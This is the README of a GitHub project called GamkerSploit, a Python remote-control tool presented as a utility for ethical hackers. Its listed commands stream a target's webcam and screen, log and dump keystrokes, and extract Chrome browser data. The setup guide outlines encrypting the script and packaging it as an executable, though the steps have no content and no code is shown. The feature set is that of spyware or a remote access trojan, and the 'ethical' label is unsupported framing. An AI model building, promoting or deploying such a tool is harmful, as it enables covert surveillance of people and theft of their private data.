gamkers / gamkersploit

17 stars 3 forks source link

gamkersploit

GamkerSploit: A Comprehensive Overview

GamkerSploit is a powerful and versatile network tool designed to facilitate remote interaction with a target system. This Python-based application integrates several functionalities, making it an essential utility for cybersecurity experts and ethical hackers. Here's a detailed description of its features:

Key Features:

  1. IP Address Retrieval:

    • get_ip_address(): This function retrieves the local IP address of the machine running the script. It uses a UDP connection to a specified IP and port to determine the local IP address.
  2. Video Stream Reception:

    • receive_video(client_socket): This feature allows the reception and display of real-time video streams from the target machine. It handles video data packets, reconstructs frames, and displays them using OpenCV.
  3. Large Data Reception:

    • receive_large_data(client_socket): This function manages the reception of large amounts of data from the target machine. It first retrieves the length of the data and then receives the data in chunks, ensuring complete data retrieval.
  4. Remote Command Execution:

    • Command Handling: The tool supports a variety of commands that can be sent to the target machine:
      • camera: Initiates video streaming from the target's camera.
      • screen: Captures and streams the target's screen.
      • start_keylog: Begins logging keystrokes on the target machine.
      • stop_keylog: Stops the keystroke logging.
      • dump_keylog: Dumps the recorded keystrokes from the target machine.
      • chrome: Fetches and displays data from the Chrome browser on the target system.
  5. Error Handling:

    • Connection Error Management: Includes robust error handling mechanisms to manage connection issues and exceptions during data reception and command execution.
  6. Interactive Shell:

    • Command-Line Interface: Provides a shell interface where users can enter commands interactively. It supports dynamic command execution and displays responses received from the target machine.

How It Works:

  1. Connection Setup:

    • The script connects to the target machine using a specified IP address and port (default port: 9999).
  2. Command Execution:

    • Users input commands through a shell interface. Commands are sent to the target machine, and responses are received and displayed.
  3. Data Handling:

    • For video and large data, the script handles streaming and reception efficiently, ensuring smooth and complete data transfer.
  4. Error Management:

    • It includes error handling for common issues such as connection loss or data reception problems.

GamkerSploit is an advanced tool designed for comprehensive remote interaction and data collection, providing essential functionalities for monitoring and data extraction in cybersecurity tasks.

Here’s a step-by-step guide to set up and use GamkerSploit, including installation, configuration, and building the executable:

Installation and Setup Guide for GamkerSploit

1. Install Python:

2. Install Git:

3. Clone the GamkerSploit Repository:

4. Configure IP Address and Port:

5. Install Required Python Packages:

6. Encrypt the Script:

7. Decrypt the Script:

8. Build the Executable:

9. Run the Executable:

Summary:

  1. Install Python and Git.
  2. Clone the GamkerSploit repository.
  3. Configure IP and port in client.py and server.py.
  4. Install necessary Python packages.
  5. Encrypt the script using encryption.py.
  6. Decrypt the script by replacing encrypted text in decrypt.py.
  7. Build the executable using PyInstaller.
  8. Run the executable from the dist directory.

This guide will help you set up GamkerSploit and build the executable file for your needs.